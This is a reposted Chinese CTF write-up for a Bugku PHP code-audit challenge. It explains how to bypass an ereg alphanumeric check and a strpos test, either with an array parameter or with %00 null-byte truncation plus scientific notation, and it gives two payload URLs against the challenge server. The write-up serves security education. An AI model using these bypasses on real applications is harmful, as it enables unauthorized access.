BUGKU-ereg正则截断(代码审计)

其他 2020-08-05 10:31:56 阅读次数: 0

ereg正则%00截断的一道代码审计:

if (isset ($_GET['password'])) {
	if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
	{
		echo '<p>You password must be alphanumeric</p>';
	}
	else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
	{
		if (strpos ($_GET['password'], '*-*') !== FALSE)
		{
			die('Flag: ' . $flag);
		}
		else
		{
			echo('<p>*-* have not been found</p>');
		}
	}
	else
	{
		echo '<p>Invalid password</p>';
	}
}

分析代码,有两个函数需要注意:

ereg() 正则限制了password格式,只能是一个或者多个数字、大小写字母
strpos() 查找某字符串在另一字符串中第一次出现的位置(区分大小写),本题中需要匹配到"-"才能输出flag

解题方法1:利用数组绕过这两个函数
ereg() 只能处理字符串,而password是数组,所以返回的是null,三个等号的时候不会进行类型转换。所以null!==false。

strpos() 的参数同样不能够是数组,所以返回的依旧是null,null!==false也正确。

Payload:http://123.206.87.240:9009/5.php?password[]=1

解题方法2:%00截断绕过正则匹配
判断是不是长度<8且>9999999

判断是不是有“-

Payload:http://123.206.87.240:9009/5.php?password=1e9%00*-*

猜你喜欢

转载自blog.csdn.net/solitudi/article/details/107634374
今日推荐
周排行
深度学习------Lingvo框架下的加速通道GPipe
webjars管理静态资源
C专家编程_2.2
mysql 源码安装
json文件操作
123231432
注解的实现
Spring MVC 控制器
《人月神话》读后感二
C#使用HttpWebRequest和HttpWebResponse上传文件示例
每日归档
更多
2024-09-08(0)
2024-09-07(0)
2024-09-06(0)
2024-09-05(0)
2024-09-04(0)
2024-09-03(0)
2024-09-02(0)
2024-09-01(0)
2024-08-31(0)
2024-08-30(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022